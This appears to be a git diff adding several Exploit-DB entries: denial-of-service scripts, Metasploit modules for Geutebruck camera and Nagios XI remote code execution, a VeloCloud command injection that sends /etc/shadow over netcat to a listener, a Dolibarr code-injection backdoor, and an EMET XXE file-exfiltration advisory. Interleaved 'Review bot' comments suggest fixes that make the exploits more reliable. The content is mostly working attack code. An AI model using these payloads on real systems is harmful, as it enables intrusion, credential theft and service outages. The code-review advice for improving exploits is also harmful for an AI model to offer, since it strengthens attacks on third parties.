diff --git a/exploits/hardware/dos/44965.py b/exploits/hardware/dos/44965.py new file mode 100755 index 000000000..d24287daf --- /dev/null +++ b/exploits/hardware/dos/44965.py @@ -0,0 +1,34 @@ +# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR +- Remote STACK-BASED BUFFER OVERFLOW +# Date: 02.07.2018 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: http://www.deltaww.com/ +# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US +# Version: +COMMGR Version 1.08 and prior. + DVPSimulator EH2, EH3, ES2, SE, SS2 + AHSIM_5x0, AHSIM_5x1 +# Tested on: Kali Linux +# CVE : CVE-2018-10594 + + +#Run exploit, result DOS + +import socket + + +ip = raw_input("[+] IP to attack: ") + +sarr = [] +i = 0 +while True: + try: + sarr.append(socket.create_connection((ip,80))) + print "[+] Connection %d" % i + crash1 = "\x41"*4412 +"\X42"*1000 + sarr[i].send(crash1+'\r\n') + i+=1 + except socket.error: + print "[*] Server crashed " + raw_input() + break \ No newline at end of file diff --git a/exploits/hardware/webapps/44957.rb b/exploits/hardware/webapps/44957.rb new file mode 100755 index 000000000..cad190b1c --- /dev/null +++ b/exploits/hardware/webapps/44957.rb 
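Review bot: The padding on the `crash1` line uses an uppercase escape, `"\X42"*1000`, which Python does not treat as a hex escape: it is the literal four characters `\X42`, so the second part of the buffer is 4000 bytes of `\X42` rather than 1000 `B`s and the buffer is 8412 bytes, not the 5412 the expression implies. Use `crash1 = "\x41"*4412 + "\x42"*1000`. The `except socket.error` branch also prints `[*] Server crashed ` for any connection failure, including an unreachable host or a filtered port 80, so a failed first connect reads as a successful crash; at least print `i` so the operator can tell zero connections from many. The script is Python 2 only (`print` statement, `raw_input`) and that belongs in the header.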
@@ -0,0 +1,68 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits a an arbitrary command execution vulnerability. The + vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an + anonymous user to execute arbitrary commands with root privileges. + Firmware <= 1.12.0.19 are concerned. + Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware. + }, + 'Author' => + [ + 'Nicolas Mattiocco', #CVE-2018-7520 (RCE) + 'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-7520' ], + [ 'URL', 'http://geutebruck.com' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic netcat bash', + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 20 2018')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']), + ], self.class) + end + + def exploit + header = "(){ :;}; " + encpayload = "#{header}#{payload.encoded}" + uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all") + print_status("#{rhost}:#{rport} - Attempting to exploit...") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri + }) + end + +end \ No newline at end of file 
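Review bot: `exploit` assigns the response to `res` but never inspects it, so the module gives no indication whether the request reached the CGI or failed outright; at minimum add `fail_with(Failure::Unreachable, 'No response from target') unless res` and print the status code, or drop the assignment. `'Privileged' => false` contradicts the description, which says the injected commands run with root privileges, and should be `true` if that claim holds (verify on the device). The `"(){ :;}; "` prefix looks like the Shellshock-style function-definition trigger, so the `Description` or a comment should say that the CGI exploit depends on a vulnerable bash on the camera, since that is the precondition a tester would check first. There is no `check` method; a harmless probe with a random marker would let `check` separate vulnerable firmware from patched builds.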
diff --git a/exploits/hardware/webapps/44959.py b/exploits/hardware/webapps/44959.py new file mode 100755 index 000000000..5c13c36d9 --- /dev/null +++ b/exploits/hardware/webapps/44959.py 
@@ -0,0 +1,89 @@ +#!/usr/bin/env python + +# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud +# Date: 2018-06-29 +# Exploit Author: paragonsec @ Critical Start +# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start +# Vendor Homepage: https://www.vmware.com +# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html +# Version: 3.1.1 +# CVE: CVE-2018-6961 + +import argparse +import requests +import sys +import collections + +''' +This script will return execute whatever payload you placed within it. +Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah +The command within this script will send stdout of commands to your netcat listener. Feel free to change :) +''' + +#Colors +OKRED = '\033[91m' +OKGREEN = '\033[92m' +ENDC = '\033[0m' + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Remote Host") +parser.add_argument("--source", help = "Victim WAN Interface (e.g ge1, ge2)") +parser.add_argument('--lhost', help = 'Local Host listener') +parser.add_argument('--lport', help = 'Local Port listener') +parser.add_argument('--func', help = 'Function to abuse (e.g traceroute, ping, dns)') +args = parser.parse_args() + +# Check to ensure at least one argument has been passed +if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + +rhost = args.rhost +source = args.source +lhost = args.lhost +lport = args.lport +func = args.func + +# Payload to be sent to the victim. Change to whatever you like! 
+# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd +payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")" + +exploit_url = "http://" + rhost + "/scripts/ajaxPortal.lua" + +headers = [ + ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), + ('Accept', 'application/json, text/javascript, */*; q=0.01'), + ('Accept-Language', 'en-US,en;q=0.5'), + ('Accept-Encoding', 'gzip, deflate'), + ('Referer','http://' + rhost + '/'), + ('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'), + ('X-Requested-With', 'XMLHttpRequest'), + ('Cookie', 'culture=en-us'), + ('Connection', 'close') +] + +# probably not necessary but did it anyways +headers = collections.OrderedDict(headers) + +# Setting up POST body parameters +if func == 'traceroute': + body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic" +elif func == 'dns': + body = "name=google.com" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic" +else: + body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic" + +print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)") +print(OKGREEN + "Credits: " + ENDC + "Brian Sullivan @ Tevora and Section 8 team @ Critical Start") +print(OKGREEN + "CVE: " + ENDC + "2018-6961") +print(OKGREEN + "Description: " + ENDC + "Multiple Unauthenticated Command Injection Vulnerabilities in VeloCloud SD-WAN GUI Application\n") + +print(OKGREEN + "[+]" + ENDC + "Running exploit...") + +s = requests.Session() + +req = requests.post(exploit_url, headers=headers, data=body) +if "UNKNOWN_COMMAND" not in req.text: + print(OKGREEN + "[+]" + ENDC + "Exploit worked. Check listener!") +else: + print(OKRED + "[!]" + ENDC + "Exploit failed. 
You lose!")
\ No newline at end of file
diff --git a/exploits/linux/dos/44962.txt b/exploits/linux/dos/44962.txt
new file mode 100644
index 000000000..1ba7fb8da
--- /dev/null
+++ b/exploits/linux/dos/44962.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
+# Date: 2018-06-30
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: http://sipp.sourceforge.net/
+# Software Link: https://github.com/SIPp/sipp/releases
+# Version: 3.6-dev and earlier
+# Tested on: 3.6-dev
+
+$ ./sipp -3pcc `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
+#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
+
+$ ./sipp -i `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
+#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
+
+$ ./sipp -log_file `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
+#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
\ No newline at end of file
diff --git a/exploits/linux/remote/44969.rb b/exploits/linux/remote/44969.rb
new file mode 100755
index 000000000..c1715c9fd
--- /dev/null
+++ b/exploits/linux/remote/44969.rb
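Review bot: None of the argparse options is `required`, yet `payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"` and `exploit_url` concatenate them unconditionally, so running without `--lhost`, `--lport` or `--rhost` dies with a `TypeError` instead of a usage message (the `len(sys.argv)==1` check only covers the no-arguments case). Mark them required, e.g. `parser.add_argument("--rhost", required=True, help="Remote Host")`, and do the same for the other three. The comment above the payload says it cats `/etc/passwd` while the code reads `/etc/shadow`; make them agree so the operator knows what is being exfiltrated. `s = requests.Session()` is created but never used, and `fictim` in the same comment is a typo for `victim`.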
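Review bot: The three reproduction commands use typographic quotes (`‘print “A” * 300'`), which a shell passes through literally, so copied as-is they do not produce a 300-byte argument; they should read `python -c 'print "A" * 300'`. The traces show `strcpy` reached from `main` at sipp.cpp:1531, 1477 and 1706 for `-3pcc`, `-i` and `-log_file`, which looks like three separate unchecked copies of argv values and is worth stating explicitly, since the title suggests a single bug. The impact is local (the attacker must control the command line), so a sentence on when that matters, for example wrappers that pass untrusted values to sipp, would help readers triage it.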
@@ -0,0 +1,363 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nagios XI Chained Remote Code Execution', + 'Description' => %q{ + This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access. + The steps are: + 1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root. + 2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys. + 3. The API keys are then used to add an administrative user. + 4. An authenticated session is established with the newly added user + 5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo, + giving us a root shell. + 6. Remove the added admin user and reset the database user. 
+ }, + 'Author' => + [ + 'Cale Smith', # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave' # @iotennui + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => ['printf'], + 'Targets' => + [ + [ + 'Nagios XI 5.2.6 <= 5.4.12', + upper_version: Gem::Version.new('5.4.12'), + lower_version: Gem::Version.new('5.2.6') + ] + ], + 'References' => + [ + ['EDB', '44560'], + ['CVE', '2018-8733'], + ['CVE', '2018-8734'], + ['CVE', '2018-8735'], + ['CVE', '2018-8736'], + ['URL', 'http://blog.redactedsec.net/exploits/2018/04/26/nagios.html'] + ], + 'Privileged' => true, + 'DefaultOptions' => { + 'WSFDELAY' => 30 + }, + 'DisclosureDate' => 'Apr 17, 2018', + 'DefaultTarget' => 0)) + register_options( + [ + #WSFDelay option is being ignored, getting around this with a call to Rex.sleep + #Sometimes Nagios doesn't execute commands immediately, so play with this parameter. + Opt::RPORT(80), + OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 15 ]) + ]) + deregister_options('SRVHOST', 'SRVPORT') + end + + def check + vprint_status "STEP 0: Get Nagios XI version string." + res = send_request_cgi!({ + 'method' => 'GET', + 'uri' => '/nagiosxi/' + }) + + if !res || !res.get_html_document + fail_with(Failure::Unknown, 'Could not check nagios version') + end + + if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text) + @version = Gem::Version.new(@version) + vprint_good("STEP 0: Found Nagios XI version: #{@version.to_s}") + if @version < target[:lower_version] + vprint_bad('Try nagios_xi_chained for this version.') + elsif (@version <= target[:upper_version] && @version >= target[:lower_version]) + return CheckCode::Appears + end + end + CheckCode::Safe + end + + def set_db_user(usr, passwd) + step = usr == 'root' ? '1' : '6.1' + vprint_status "STEP #{step}: Setting Nagios XI DB user to #{usr}." 
+ res = send_request_cgi({ + 'uri' => '/nagiosql/admin/settings.php', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => true, + 'vars_post' => { + 'txtRootPath'=>'nagiosql', + 'txtBasePath'=>'/var/www/html/nagiosql/', + 'selProtocol'=>'http', + 'txtTempdir'=>'/tmp', + 'selLanguage'=>'en_GB', + 'txtEncoding'=>'utf-8', + 'txtDBserver'=>'localhost', + 'txtDBport'=>3306, + 'txtDBname'=>'nagiosql', + 'txtDBuser'=> usr, + 'txtDBpass'=> passwd, + 'txtLogoff'=>3600, + 'txtLines'=>15, + 'selSeldisable'=>1 + } + }) + + if !res || res.code != 302 + fail_with(Failure::UnexpectedReply,"STEP #{step}: Unexpected response setting db user to root") + end + vprint_status "STEP #{step}: Received a 302 Response. That's good!" + end + + def get_api_keys + vprint_status 'STEP 2: Exploiting SQLi to extract user API keys.' + + sqli_parm = @version < Gem::Version.new('5.3.0') ? 'backend_ticket' : 'api_key' + sqli_val = rand_text_alpha(rand(5) + 5) + res = send_request_cgi({ + 'uri' => '/nagiosql/admin/helpedit.php', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => true, + 'vars_post' => { + 'selInfoKey1'=>"#{sqli_val}'UNION SELECT CONCAT('START_API:',#{sqli_parm},':END_API') FROM nagiosxi.xi_users-- ", + 'hidKey1'=>'common', + 'selInfoKey2'=>'free_variables_name', + 'hidKey2'=>'', + 'selInfoVersion'=>'', + 'hidVersion'=>'', + 'taContent'=>'', + 'modus'=>0 + } + }) + + if !res || res.code != 302 || !res.body + fail_with(Failure::UnexpectedReply,'STEP 2: Unexpected response extracting api keys') + end + + vprint_status 'STEP 2: Received a 302 Response. That\'s good!' 
+ parse_api_key(res.body) + end + + def parse_api_key(res_body) + begin_positions = res_body.enum_for(:scan, /START_API:/).map { Regexp.last_match.end(0) } + end_positions = res_body.enum_for(:scan, /:END_API/).map { Regexp.last_match.begin(0) - 1 } + api_keys = [] + + begin_positions.each_with_index do|val, i| + key = res_body[val..end_positions[i]] + unless api_keys.include?(key) + api_keys << key + end + end + + if api_keys.length < 1 + fail_with(Failure::Unknown, 'Could not parse api keys') + end + + vprint_status "Found #{api_keys.length.to_s} unique api keys" + api_keys.each do |key| + vprint_status key + end + + api_keys + end + + def add_admin(keys, username, password) + vprint_status 'STEP 3: Using API Keys to add an administrative user...' + keys.each do |key| + user_id = try_add_admin(key, username, password) + + if (user_id.to_i > 0) + vprint_good "Added user:#{username} password:#{password} userid:#{user_id}" + return user_id.to_s, key + end + end + fail_with(Failure::Unknown, 'STEP 3: Failed to add a user.') + end + + def try_add_admin(key, username, passwd) + vprint_status "STEP 3: trying to add admin user with key #{key}" + res = send_request_cgi({ + 'uri'=> "/nagiosxi/api/v1/system/user", + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_get' => { + 'apikey' => key, + 'pretty' => 1 + }, + 'vars_post' =>{ + 'username' => username, + 'password' => passwd, + 'name' => rand_text_alpha(rand(5) + 5), + 'email' =>"#{username}@localhost", + 'auth_level' =>'admin', + 'force_pw_change' => 0 + } + }) + + json = res.get_json_document + json['userid'] ? json['userid'].to_i : -1 + end + + def delete_admin(key, user_id) + res = send_request_cgi({ + 'uri'=> "/nagiosxi/api/v1/system/user/#{user_id}", + 'method' => 'DELETE', + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_get' => { + 'apikey' => key + } + }) + + res.body && res.body.include?('was added successfully') ? 
username : false + end + + def login(username, password) + vprint_status "STEP 4.1: Authenticate as user #{username} with password #{password}" + #4.1 Get nsp for login + vprint_status 'STEP 4.1: Get NSP and nagiosxi for login..' + res = send_request_cgi({ + 'uri' =>'/nagiosxi/login.php', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded' + }) + + if !res || !res.body + fail_with(Failure::Unknown, 'STEP 4.1: Could not get nsp string for login') + end + + login_nsp = parse_nsp_str(res.body) + vprint_status "STEP 4.1: login_nsp #{login_nsp} " + + login_nagiosxi = parse_nagiosxi(res) + vprint_status "STEP 4.1: login_nagiosxi #{login_nagiosxi}" + + vprint_status 'STEP 4.2: Authenticating...' + res = send_request_cgi({ + 'uri'=> '/nagiosxi/login.php', + 'ctype' => 'application/x-www-form-urlencoded', + 'method' => 'POST', + 'cookie' => "nagiosxi=#{login_nagiosxi};", + 'vars_post'=> { + 'nsp' => login_nsp, + 'page' => 'auth', + 'debug' => '', + 'pageopt' => 'login', + 'username' => username, + 'password' => password, + 'loginButton' => '' + } + }) + + if !res || res.code != 302 + fail_with(Failure::Unknown, 'STEP 4.2 Could not get authed nsp string.') + end + + authed_nagiosxi = parse_nagiosxi(res) + vprint_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}" + authed_nagiosxi + end + + def parse_nsp_str(resp_body) + nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body) + + unless nsp_strs || nsp_strs.length < 2 + fail_with(Failure::NotFound, 'Could not find nsp_str') + end + + nsp_strs[1] + end + + def parse_nagiosxi(res) + cookie = res.get_cookies + matches = /.*nagiosxi=(.+);/.match(cookie) + + unless matches || matches.length < 2 + fail_with(Failure::NotFound, 'Could not find nagiosxi cookie') + end + + matches[1] + end + + def execute_command(cmd, opts = {}) + backup_file = rand_text_alpha(rand(5) + 10) + + cmd_execution = "$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/#{backup_file} ; echo \"#{cmd}\" > 
/usr/local/nagiosxi/scripts/reset_config_perms.sh ; sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh) &" + + cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/#{backup_file} /usr/local/nagiosxi/scripts/reset_config_perms.sh)" + opts_exec = { + 'uri'=> '/nagiosxi/backend/index.php', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => "nagiosxi=#{@nagiosxi}", + 'vars_get' => { + 'cmd'=>'submitcommand', + 'command'=>'1111', + 'command_data'=> cmd_execution + } + } + + opts_cleanup = { + 'uri'=> '/nagiosxi/backend/index.php', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => "nagiosxi=#{@nagiosxi}", + 'vars_get' => { + 'cmd'=>'submitcommand', + 'command'=>'1111', + 'command_data'=> cmd_cleanup + } + } + + vprint_status 'STEP 5.1: executing payload' + res = send_request_cgi(opts_exec) + + if !res || res.code != 200 + fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed') + end + + vprint_status 'STEP 5.2: removing scripts from disc' + res = send_request_cgi(opts_cleanup) + + if !res || res.code != 200 + fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed') + end + end + + def exploit + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!') + end + + set_db_user('root', 'nagiosxi') + + keys = get_api_keys + username = rand_text_alpha(rand(6) + 10) + password = rand_text_alpha(rand(6) + 10) + + user_id, key = add_admin(keys, username, password) + @nagiosxi = login(username, password) + execute_cmdstager() + + #revert databaseuser + set_db_user('nagiosql', 'n@gweb') + vprint_status 'STEP 6.2: deleting admin' + delete_admin(key, user_id) + + #The WSFDelay option is being ignored currently, so this is this workaround. + Rex.sleep(datastore['WAIT'].to_i) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44960.html b/exploits/php/webapps/44960.html new file mode 100644 index 000000000..ab2d94928 
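Review bot: The guards in `parse_nsp_str` and `parse_nagiosxi` are inverted: `unless nsp_strs || nsp_strs.length < 2` evaluates `nil.length` when the regex does not match, so a missing `nsp_str` raises `NoMethodError` instead of reaching `fail_with`; it should be `if nsp_strs.nil? || nsp_strs.length < 2` (and the same for `matches`). `delete_admin` tests the DELETE response for `'was added successfully'`, which is the add-user message, and returns `username`, which is not defined in that method, so it can never report a successful deletion and the call in `exploit` ignores the result anyway; check the API's delete response and return a boolean. `set_db_user` overwrites the whole NagiosQL settings form with assumed defaults (`/var/www/html/nagiosql/`, `localhost:3306`, and on revert the credentials `nagiosql`/`n@gweb`), so on a target that changed any of those the module leaves NagiosQL misconfigured after the run; that destructive side effect belongs in the `Description`. `execute_command` likewise replaces the sudo-permitted `reset_config_perms.sh` with the payload and restores it afterwards, so if the cleanup request fails the target is left with the payload script in place and the backup file on disk.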
--- /dev/null +++ b/exploits/php/webapps/44960.html @@ -0,0 +1,25 @@ + + + + + +
+ + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44964.txt b/exploits/php/webapps/44964.txt
new file mode 100644
index 000000000..0c1f6f3f2
--- /dev/null
+++ b/exploits/php/webapps/44964.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
+# Date: 06/29/2018
+# Exploit Author: om3rcitak - https://omercitak.com
+# Vendor Homepage: https://dolibarr.org
+# Software Link: https://github.com/Dolibarr/dolibarr
+# Version: =<7.0.3
+# Tested on: Unix, Windows
+
+## Technical Details
+URL: http://{domain}/{dolibarr_path}/install/step1.php
+Parameter Name: db_name
+Parameter Type: POST
+Attack Pattern: x\';system($_GET[cmd]);//
+
+## Steps to reproduce the behavior
+- Go to fresh install page.
+- Click "Next Step" button for create example config file (conf/conf.php)
+- Send this request:
+```
+POST {dolibarr_path}/install/step1.php HTTP/1.1
+Host: {domain}
+
+testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
+```
+- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
+
+## Timeline
+- 06/29/2018 18:30 - Found vulnerability.
+- 06/29/2018 18:44 - Report vendor.
+- 06/29/2018 20:38 - Vulnerability fixed by vendor.
+
+GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
\ No newline at end of file
diff --git a/exploits/windows/dos/44958.py b/exploits/windows/dos/44958.py
new file mode 100755
index 000000000..89aa813be
--- /dev/null
+++ b/exploits/windows/dos/44958.py
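Review bot: The precondition is only implicit: step 1 says "Go to fresh install page", which means `install/step1.php` must still be reachable, so the advisory should state that explicitly and say how an assessor can tell whether an already-installed instance still exposes the installer, since on a completed install the request presumably never reaches the vulnerable code (confirm). It should also say that the injected `db_name` is written into `conf/conf.php` by step 2 and persists, so the backdoor survives until that file is cleaned. The request body hard-codes Windows paths (`main_dir=C:/Ampps/www`) while the header claims Unix and Windows; note that `main_dir` and `main_data_dir` must match the target or the config write will likely fail. The final URL has an unencoded space in `cmd=cat /etc/passwd`; write `cmd=cat%20/etc/passwd`.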
@@ -0,0 +1,50 @@ +# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC) +# Date: 2018-06-28 +# Exploit Author: Berk Cem Göksel +# Vendor Homepage: http://www.coreftp.com/ +# Software Link: http://www.coreftp.com/download +# Version: Core FTP Client LE v2.2 Build 1921 +# Tested on: Windows 10 +# Category: Dos +# CVE : CVE-2018-12113 +# coding: utf-8 + +# Description:] +# The vulnerability was discovered during a vulnerability research lecture. +# This is meant to be a PoC. + +#!/usr/bin/env python + +import socket + +IP = '0.0.0.0' +port = 21 + + +Stack_beginning = 3004 + +buff = "\x90" * (3004) + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((IP, port)) + s.listen(20) + print("[i] FTP Server started on port: "+str(port)+"\r\n") +except: + print("[!] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome!' + '\r\n') + print conn.recv(1024) + conn.send('331 OK.\r\n') + print conn.recv(1024) + conn.send('230 OK.\r\n') + print conn.recv(1024) + conn.send('215 UNIX Type: L8\r\n') + print conn.recv(1024) + conn.send('257 "/" is current directory.\r\n') + print conn.recv(1024) + conn.send('227 Entering Passive Mode (' + buff + ')\r\n') + print conn.recv(1024) + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/exploits/windows/local/44961.txt b/exploits/windows/local/44961.txt new file mode 100644 index 000000000..b079b820e --- /dev/null +++ b/exploits/windows/local/44961.txt 
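Review bot: A failed `s.bind` is not fatal: the bare `except:` prints the message and the script falls through to `s.accept()`, which then raises on an unbound socket; use `except socket.error as e:` and `sys.exit(1)` after the print (with `import sys`). The `#!/usr/bin/env python` line and `# coding: utf-8` are placed after the comment header, where neither has any effect, since a shebang must be line 1 and a coding cookie must be on line 1 or 2. `Stack_beginning = 3004` is assigned but never used; either use it as `buff = "\x90" * Stack_beginning` or drop it. `print conn.recv(1024)` without parentheses makes this Python 2 only while the earlier `print("...")` calls look like Python 3, so state the interpreter in the header.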
@@ -0,0 +1,112 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-EMET-XML-INJECTION.txt +[+] ISR: Apparition Security + + + +***Greetz: indoushka|Eduardo|Dirty0tis|cor3sm4sh3r*** + + + +Vendor: +================ +www.microsoft.com + + +Product: +=========== +Enhanced Mitigation Experience Toolkit (EMET) + +Enhanced Mitigation Experience Toolkit is a freeware security toolkit for Microsoft Windows, developed by Microsoft. +It provides a unified interface to enable and fine-tune Windows security features. + + + +Vulnerability Type: +=================== +XML External Entity Injection + + + +CVE Reference: +============== +N/A + + +Security Issue: +================ +EMETs XML parser does not account for external entity declarations in ".config" files. This allows outbound network connections and users local files +to be exfiltrated to remote attacker controlled server. Conditions are a user must be tricked into importing a specially crafted XML file. + + + +Exploit/POC: +============= +1) python -m SimpleHTTPServer + + +2) "payload.dtd" + + +"> +%all; + + +3) "config.xml" + +import into EMET interface. + + + + + +%dtd;]> +&send; + + +Result seen on ATTACK-SERVER: +============================= + +C:\sec>python -m SimpleHTTPServer +Serving HTTP on 0.0.0.0 port 8000 ... 
+PC - - [19/May/2018 22:53:02] "GET /payload.dtd HTTP/1.1" 200 - +PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8 +0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa +ve=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 301 - +PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8 +0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: June 5, 2018 +Vendor reply : "We determined your finding is valid but does not meet our bar for servicing" : June 30, 2018 +June 30, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/remote/44968.rb b/exploits/windows/remote/44968.rb new file mode 100755 index 000000000..939045678 --- /dev/null +++ b/exploits/windows/remote/44968.rb 
